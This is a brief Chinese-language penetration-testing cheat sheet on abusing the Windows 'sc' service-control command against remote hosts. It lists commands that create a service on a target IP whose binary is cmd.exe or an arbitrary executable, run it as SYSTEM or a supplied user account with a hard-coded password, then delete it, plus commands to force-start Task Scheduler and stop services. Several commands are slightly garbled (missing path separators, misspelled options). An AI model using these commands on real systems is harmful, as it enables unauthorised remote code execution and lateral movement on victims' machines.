sc 在滲透中常用的功能有三個,遠端執行東西,遠端開啟/關閉服務,查服務的資訊,如服務的exe路徑。
1.1 執行命令(系統許可權):
//其他執行命令方法參考:http://bra.adminsec.com/security/787.html
sc 10.1.1.1 create winnt binpath= c:cmd.exe
sc 10.1.1.1 start winnt
sc 10.1.1.1 delete winnt
1.2 執行命令(指定使用者許可權)
sc 10.1.1.1 create adminsec binpath = "c:pass.exe" obj= "adminsecadministrator" passwrod= adminsec
sc ip start testsrvname
2、 遠端開啟/關閉服務,如啟動計劃任務。感覺at執行東西比sc相容更好。
sc.exe 10.1.1.1 config schedule start= auto //注意=後面有個空格,有時候不anto開啟不成功。
sc.exe 10.1.1.1 start "schedule"
關閉某個服務:
sc getkeyname "Task Scheduler" //獲取服務名
sc stop "Schedule"
其他技巧,如需要獲取某個服務的執行檔案路徑。
sc qc schedule
PS: sc要注意的是服務名和顯示名,這2個是不同的概念